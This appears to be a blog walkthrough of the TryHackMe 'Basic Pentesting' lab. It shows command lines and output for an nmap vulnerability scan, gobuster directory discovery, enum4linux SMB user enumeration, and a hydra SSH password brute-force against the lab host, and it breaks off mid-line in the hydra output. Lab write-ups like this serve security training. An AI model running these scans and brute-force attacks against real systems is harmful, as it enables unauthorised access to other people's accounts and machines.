progrez.cloud

Basic Pentesting - Tryhackme

27 Februari 2021

Basic Pentesting


This is a machine that allows you to practise web app hacking and privilege escalation


Task 1 # Web App Testing and Privilege Escalation


In these set of tasks you'll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network

Credits to Josiah Pierce from Vulnhub.


Deploy the machine and connect to our network


Find the services exposed by the machine


Scanning port vuln

┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo nmap --script vuln -sV 10.10.139.231
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 21:40 WIT
Nmap scan report for 10.10.139.231
Host is up (0.30s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| vulners: 
|  cpe:/a:openbsd:openssh:7.2p2: 
|       PACKETSTORM:140070   7.8   https://vulners.com/packetstorm/PACKETSTORM:140070   *EXPLOIT*
|       EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09   7.8   https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09   *EXPLOIT*
|       EDB-ID:40888   7.8   https://vulners.com/exploitdb/EDB-ID:40888   *EXPLOIT*
|       CVE-2016-8858   7.8   https://vulners.com/cve/CVE-2016-8858
|       CVE-2016-6515   7.8   https://vulners.com/cve/CVE-2016-6515
|       1337DAY-ID-26494   7.8   https://vulners.com/zdt/1337DAY-ID-26494   *EXPLOIT*
|       SSV:92579   7.5   https://vulners.com/seebug/SSV:92579   *EXPLOIT*
|       CVE-2016-10009   7.5   https://vulners.com/cve/CVE-2016-10009
|       1337DAY-ID-26576   7.5   https://vulners.com/zdt/1337DAY-ID-26576   *EXPLOIT*
|       SSV:92582   7.2   https://vulners.com/seebug/SSV:92582   *EXPLOIT*
|       CVE-2016-10012   7.2   https://vulners.com/cve/CVE-2016-10012
|       CVE-2015-8325   7.2   https://vulners.com/cve/CVE-2015-8325
|       SSV:92580   6.9   https://vulners.com/seebug/SSV:92580   *EXPLOIT*
|       CVE-2016-10010   6.9   https://vulners.com/cve/CVE-2016-10010
|       1337DAY-ID-26577   6.9   https://vulners.com/zdt/1337DAY-ID-26577   *EXPLOIT*
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19   5.8   https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19   *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97   5.8   https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97   *EXPLOIT*
|       EDB-ID:46516   5.8   https://vulners.com/exploitdb/EDB-ID:46516   *EXPLOIT*
|       CVE-2019-6111   5.8   https://vulners.com/cve/CVE-2019-6111
|       SSV:91041   5.5   https://vulners.com/seebug/SSV:91041   *EXPLOIT*
|       PACKETSTORM:140019   5.5   https://vulners.com/packetstorm/PACKETSTORM:140019   *EXPLOIT*
|       PACKETSTORM:136234   5.5   https://vulners.com/packetstorm/PACKETSTORM:136234   *EXPLOIT*
|       EXPLOITPACK:F92411A645D85F05BDBD274FD222226F   5.5   https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F   *EXPLOIT*
|       EXPLOITPACK:9F2E746846C3C623A27A441281EAD138   5.5   https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138   *EXPLOIT*
|       EXPLOITPACK:1902C998CBF9154396911926B4C3B330   5.5   https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330   *EXPLOIT*
|       EDB-ID:40858   5.5   https://vulners.com/exploitdb/EDB-ID:40858   *EXPLOIT*
|       CVE-2016-3115   5.5   https://vulners.com/cve/CVE-2016-3115
|       SSH_ENUM   5.0   https://vulners.com/canvas/SSH_ENUM   *EXPLOIT*
|       PACKETSTORM:150621   5.0   https://vulners.com/packetstorm/PACKETSTORM:150621   *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS   5.0   https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS   *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0   5.0   https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0   *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283   5.0   https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283   *EXPLOIT*
|       EDB-ID:45939   5.0   https://vulners.com/exploitdb/EDB-ID:45939   *EXPLOIT*
|       CVE-2018-15919   5.0   https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473   5.0   https://vulners.com/cve/CVE-2018-15473
|       CVE-2017-15906   5.0   https://vulners.com/cve/CVE-2017-15906
|       CVE-2016-10708   5.0   https://vulners.com/cve/CVE-2016-10708
|       1337DAY-ID-31730   5.0   https://vulners.com/zdt/1337DAY-ID-31730   *EXPLOIT*
|       EDB-ID:45233   4.6   https://vulners.com/exploitdb/EDB-ID:45233   *EXPLOIT*
|       EDB-ID:40963   4.6   https://vulners.com/exploitdb/EDB-ID:40963   *EXPLOIT*
|       EDB-ID:40962   4.6   https://vulners.com/exploitdb/EDB-ID:40962   *EXPLOIT*
|       EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF   4.3   https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF   *EXPLOIT*
|       EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF   4.3   https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF   *EXPLOIT*
|       CVE-2020-14145   4.3   https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-6210   4.3   https://vulners.com/cve/CVE-2016-6210
|       1337DAY-ID-25440   4.3   https://vulners.com/zdt/1337DAY-ID-25440   *EXPLOIT*
|       1337DAY-ID-25438   4.3   https://vulners.com/zdt/1337DAY-ID-25438   *EXPLOIT*
|       CVE-2019-6110   4.0   https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0   https://vulners.com/cve/CVE-2019-6109
|       CVE-2018-20685   2.6   https://vulners.com/cve/CVE-2018-20685
|       SSV:92581   2.1   https://vulners.com/seebug/SSV:92581   *EXPLOIT*
|       CVE-2016-10011   2.1   https://vulners.com/cve/CVE-2016-10011
|       PACKETSTORM:151227   0.0   https://vulners.com/packetstorm/PACKETSTORM:151227   *EXPLOIT*
|       PACKETSTORM:140261   0.0   https://vulners.com/packetstorm/PACKETSTORM:140261   *EXPLOIT*
|       PACKETSTORM:138006   0.0   https://vulners.com/packetstorm/PACKETSTORM:138006   *EXPLOIT*
|       PACKETSTORM:137942   0.0   https://vulners.com/packetstorm/PACKETSTORM:137942   *EXPLOIT*
|       EDB-ID:46193   0.0   https://vulners.com/exploitdb/EDB-ID:46193   *EXPLOIT*
|       EDB-ID:40136   0.0   https://vulners.com/exploitdb/EDB-ID:40136   *EXPLOIT*
|       EDB-ID:40113   0.0   https://vulners.com/exploitdb/EDB-ID:40113   *EXPLOIT*
|       EDB-ID:39569   0.0   https://vulners.com/exploitdb/EDB-ID:39569   *EXPLOIT*
|       1337DAY-ID-32009   0.0   https://vulners.com/zdt/1337DAY-ID-32009   *EXPLOIT*
|       1337DAY-ID-30937   0.0   https://vulners.com/zdt/1337DAY-ID-30937   *EXPLOIT*
|_      1337DAY-ID-10010   0.0   https://vulners.com/zdt/1337DAY-ID-10010   *EXPLOIT*
80/tcp  open http       Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_ /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-slowloris-check: 
|  VULNERABLE:
|  Slowloris DOS attack
|    State: LIKELY VULNERABLE
|    IDs: CVE:CVE-2007-6750
|      Slowloris tries to keep many connections to the target web server open and hold
|      them open as long as possible. It accomplishes this by opening connections to
|      the target web server and sending a partial request. By doing so, it starves
|      the http server's resources causing Denial Of Service.
|      
|    Disclosure date: 2009-09-17
|    References:
|      http://ha.ckers.org/slowloris/
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|  cpe:/a:apache:http_server:2.4.18: 
|       CVE-2017-7679   7.5   https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5   https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5   https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5   https://vulners.com/cve/CVE-2017-3167
|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB   7.2   https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB   *EXPLOIT*
|       CVE-2019-0211   7.2   https://vulners.com/cve/CVE-2019-0211
|       1337DAY-ID-32502   7.2   https://vulners.com/zdt/1337DAY-ID-32502   *EXPLOIT*
|       CVE-2018-1312   6.8   https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715   6.8   https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082   6.4   https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4   https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0   https://vulners.com/cve/CVE-2019-0217
|       EDB-ID:47689   5.8   https://vulners.com/exploitdb/EDB-ID:47689   *EXPLOIT*
|       CVE-2020-1927   5.8   https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098   5.8   https://vulners.com/cve/CVE-2019-10098
|       1337DAY-ID-33577   5.8   https://vulners.com/zdt/1337DAY-ID-33577   *EXPLOIT*
|       CVE-2016-5387   5.1   https://vulners.com/cve/CVE-2016-5387
|       SSV:96537   5.0   https://vulners.com/seebug/SSV:96537   *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED   5.0   https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED   *EXPLOIT*
|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D   5.0   https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D   *EXPLOIT*
|       EXPLOITPACK:2666FB0676B4B582D689921651A30355   5.0   https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355   *EXPLOIT*
|       EDB-ID:40909   5.0   https://vulners.com/exploitdb/EDB-ID:40909   *EXPLOIT*
|       CVE-2020-1934   5.0   https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0   https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0   https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199   5.0   https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-17189   5.0   https://vulners.com/cve/CVE-2018-17189
|       CVE-2018-1333   5.0   https://vulners.com/cve/CVE-2018-1333
|       CVE-2018-1303   5.0   https://vulners.com/cve/CVE-2018-1303
|       CVE-2017-9798   5.0   https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710   5.0   https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0   https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-8740   5.0   https://vulners.com/cve/CVE-2016-8740
|       CVE-2016-4979   5.0   https://vulners.com/cve/CVE-2016-4979
|       1337DAY-ID-28573   5.0   https://vulners.com/zdt/1337DAY-ID-28573   *EXPLOIT*
|       CVE-2019-0197   4.9   https://vulners.com/cve/CVE-2019-0197
|       EDB-ID:47688   4.3   https://vulners.com/exploitdb/EDB-ID:47688   *EXPLOIT*
|       CVE-2020-11985   4.3   https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092   4.3   https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-1302   4.3   https://vulners.com/cve/CVE-2018-1302
|       CVE-2018-1301   4.3   https://vulners.com/cve/CVE-2018-1301
|       CVE-2018-11763   4.3   https://vulners.com/cve/CVE-2018-11763
|       CVE-2016-4975   4.3   https://vulners.com/cve/CVE-2016-4975
|       CVE-2016-1546   4.3   https://vulners.com/cve/CVE-2016-1546
|       1337DAY-ID-33575   4.3   https://vulners.com/zdt/1337DAY-ID-33575   *EXPLOIT*
|       CVE-2018-1283   3.5   https://vulners.com/cve/CVE-2018-1283
|       CVE-2016-8612   3.3   https://vulners.com/cve/CVE-2016-8612
|       PACKETSTORM:152441   0.0   https://vulners.com/packetstorm/PACKETSTORM:152441   *EXPLOIT*
|       EDB-ID:46676   0.0   https://vulners.com/exploitdb/EDB-ID:46676   *EXPLOIT*
|       EDB-ID:42745   0.0   https://vulners.com/exploitdb/EDB-ID:42745   *EXPLOIT*
|       1337DAY-ID-663   0.0   https://vulners.com/zdt/1337DAY-ID-663   *EXPLOIT*
|       1337DAY-ID-601   0.0   https://vulners.com/zdt/1337DAY-ID-601   *EXPLOIT*
|       1337DAY-ID-4533   0.0   https://vulners.com/zdt/1337DAY-ID-4533   *EXPLOIT*
|       1337DAY-ID-3109   0.0   https://vulners.com/zdt/1337DAY-ID-3109   *EXPLOIT*
|_      1337DAY-ID-2237   0.0   https://vulners.com/zdt/1337DAY-ID-2237   *EXPLOIT*
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open http       Apache Tomcat 9.0.7
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|  /examples/: Sample scripts
|  /manager/html/upload: Apache Tomcat (401 )
|  /manager/html: Apache Tomcat (401 )
|_ /docs/: Potentially interesting folder
| http-method-tamper: 
|  VULNERABLE:
|  Authentication bypass by HTTP verb tampering
|    State: VULNERABLE (Exploitable)
|      This web server contains password protected resources vulnerable to authentication bypass
|      vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|       common HTTP methods and in misconfigured .htaccess files.
|             
|    Extra information:
|      
|  URIs suspected to be vulnerable to HTTP verb tampering:
|    /manager/status [GENERIC]
|  
|    References:
|      http://www.mkit.com.ar/labs/htexploit/
|      http://capec.mitre.org/data/definitions/274.html
|      https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_     http://www.imperva.com/resources/glossary/http_verb_tampering.html
| http-slowloris-check: 
|  VULNERABLE:
|  Slowloris DOS attack
|    State: LIKELY VULNERABLE
|    IDs: CVE:CVE-2007-6750
|      Slowloris tries to keep many connections to the target web server open and hold
|      them open as long as possible. It accomplishes this by opening connections to
|      the target web server and sending a partial request. By doing so, it starves
|      the http server's resources causing Denial Of Service.
|      
|    Disclosure date: 2009-09-17
|    References:
|      http://ha.ckers.org/slowloris/
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|  cpe:/a:apache:tomcat:9.0.7: 
|       PACKETSTORM:153506   9.3   https://vulners.com/packetstorm/PACKETSTORM:153506   *EXPLOIT*
|       MSF:EXPLOIT/WINDOWS/HTTP/TOMCAT_CGI_CMDLINEARGS   9.3   https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/HTTP/TOMCAT_CGI_CMDLINEARGS   *EXPLOIT*
|       EDB-ID:47073   9.3   https://vulners.com/exploitdb/EDB-ID:47073   *EXPLOIT*
|       CVE-2019-0232   9.3   https://vulners.com/cve/CVE-2019-0232
|       1337DAY-ID-32925   9.3   https://vulners.com/zdt/1337DAY-ID-32925   *EXPLOIT*
|       EDB-ID:49039   7.5   https://vulners.com/exploitdb/EDB-ID:49039   *EXPLOIT*
|       CVE-2020-1938   7.5   https://vulners.com/cve/CVE-2020-1938
|       CVE-2018-8014   7.5   https://vulners.com/cve/CVE-2018-8014
|       CVE-2020-1935   5.8   https://vulners.com/cve/CVE-2020-1935
|       CVE-2019-17563   5.1   https://vulners.com/cve/CVE-2019-17563
|       CVE-2020-17527   5.0   https://vulners.com/cve/CVE-2020-17527
|       CVE-2020-13935   5.0   https://vulners.com/cve/CVE-2020-13935
|       CVE-2020-13934   5.0   https://vulners.com/cve/CVE-2020-13934
|       CVE-2020-11996   5.0   https://vulners.com/cve/CVE-2020-11996
|       CVE-2019-10072   5.0   https://vulners.com/cve/CVE-2019-10072
|       CVE-2019-0199   5.0   https://vulners.com/cve/CVE-2019-0199
|       CVE-2018-8034   5.0   https://vulners.com/cve/CVE-2018-8034
|       CVE-2018-1336   5.0   https://vulners.com/cve/CVE-2018-1336
|       CVE-2020-9484   4.4   https://vulners.com/cve/CVE-2020-9484
|       CVE-2019-12418   4.4   https://vulners.com/cve/CVE-2019-12418
|       CVE-2021-24122   4.3   https://vulners.com/cve/CVE-2021-24122
|       CVE-2019-0221   4.3   https://vulners.com/cve/CVE-2019-0221
|       CVE-2018-8037   4.3   https://vulners.com/cve/CVE-2018-8037
|       CVE-2018-11784   4.3   https://vulners.com/cve/CVE-2018-11784
|_      CVE-2020-13943   4.0   https://vulners.com/cve/CVE-2020-13943
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|  VULNERABLE:
|  Service regsvc in Microsoft Windows systems vulnerable to denial of service
|    State: VULNERABLE
|      The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|      pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|      while working on smb-enum-sessions.
|_         

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 930.76 seconds


What is the name of the hidden directory on the web server(enter name without /)?

Go to command in here.

┌─[cyber@cyber]─[~]
└──╼ $gobuster dir -u http://10.10.139.231 -w dirb/wordlists/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:           http://10.10.139.231
[+] Threads:       10
[+] Wordlist:      dirb/wordlists/common.txt
[+] Status codes:  200,204,301,302,307,401,403
[+] User Agent:    gobuster/3.0.1
[+] Timeout:       10s
===============================================================
2021/02/27 21:28:54 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
[ERROR] 2021/02/27 21:29:39 [!] Get http://10.10.139.231/confirm: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/02/27 21:29:40 [!] Get http://10.10.139.231/connections: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/02/27 21:29:42 [!] Get http://10.10.139.231/coupon: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/development (Status: 301)
/index.html (Status: 200)
[ERROR] 2021/02/27 21:30:39 [!] Get http://10.10.139.231/LICENSE: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/02/27 21:31:17 [!] Get http://10.10.139.231/prodconf: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/02/27 21:31:27 [!] Get http://10.10.139.231/religion: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/server-status (Status: 403)
===============================================================
2021/02/27 21:32:08 Finished
===============================================================

Answer = /development


User brute-forcing to find the username & password


What is the username?

Go to commang in here.

┌─[cyber@cyber]─[~]
└──╼ $enum4linux -a 10.10.139.231
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 27 21:47:36 2021

 ========================== 
|   Target Information   |
 ========================== 
Target ........... 10.10.139.231
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|   Enumerating Workgroup/Domain on 10.10.139.231   |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|   Nbtstat Information for 10.10.139.231   |
 ============================================= 
Looking up status of 10.10.139.231
   BASIC2         <00> -        B <ACTIVE> Workstation Service
   BASIC2         <03> -        B <ACTIVE> Messenger Service
   BASIC2         <20> -        B <ACTIVE> File Server Service
   ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
   WORKGROUP      <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
   WORKGROUP      <1d> -        B <ACTIVE> Master Browser
   WORKGROUP      <1e> - <GROUP> B <ACTIVE> Browser Service Elections

   MAC Address = 00-00-00-00-00-00

 ====================================== 
|   Session Check on 10.10.139.231   |
 ====================================== 
[+] Server 10.10.139.231 allows sessions using username '', password ''

 ============================================ 
|   Getting domain SID for 10.10.139.231   |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|   OS information on 10.10.139.231   |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.139.231 from smbclient: 
[+] Got OS info for 10.10.139.231 from srvinfo:
   BASIC2        Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
   platform_id    :   500
   os version     :   6.1
   server type    :   0x809a03

 ============================== 
|   Users on 10.10.139.231   |
 ============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================== 
|   Share Enumeration on 10.10.139.231   |
 ========================================== 

   Sharename      Type     Comment
   ---------      ----     -------
   Anonymous      Disk     
   IPC$           IPC      IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.139.231
//10.10.139.231/Anonymous   Mapping: OK, Listing: OK
//10.10.139.231/IPC$   [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing *

 ===================================================== 
|   Password Policy Information for 10.10.139.231   |
 ===================================================== 


[+] Attaching to 10.10.139.231 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

   [+] BASIC2
   [+] Builtin

[+] Password Info for Domain: BASIC2

   [+] Minimum password length: 5
   [+] Password history length: None
   [+] Maximum password age: 37 days 6 hours 21 minutes 
   [+] Password Complexity Flags: 000000

      [+] Domain Refuse Password Change: 0
      [+] Domain Password Store Cleartext: 0
      [+] Domain Password Lockout Admins: 0
      [+] Domain Password No Clear Change: 0
      [+] Domain Password No Anon Change: 0
      [+] Domain Password Complex: 0

   [+] Minimum password age: None
   [+] Reset Account Lockout Counter: 30 minutes 
   [+] Locked Account Duration: 30 minutes 
   [+] Account Lockout Threshold: None
   [+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|   Groups on 10.10.139.231   |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|   Users on 10.10.139.231 via RID cycling (RIDS: 500-550,1000-1050)   |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix Userkay (Local User)
S-1-22-1-1001 Unix Userjan (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown**unknown* (8)

Answer = jan


What is the password?


Go to command

┌─[✗]─[cyber@cyber]─[~]
└──╼ $hydra -t 16 -l jan -P rockyou.txt ssh://10.10.139.231
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-27 22:27:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.139.231:22/
[STATUS] 147.00 tries/min, 147 tries in 00:01h, 14344253 to do in 1626:20h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344062 to do in 2121:55h, 16 active
[STATUS] 105.43 tries/min, 738 tries in 00:07h, 14343662 to do in 2267:s="hljs-number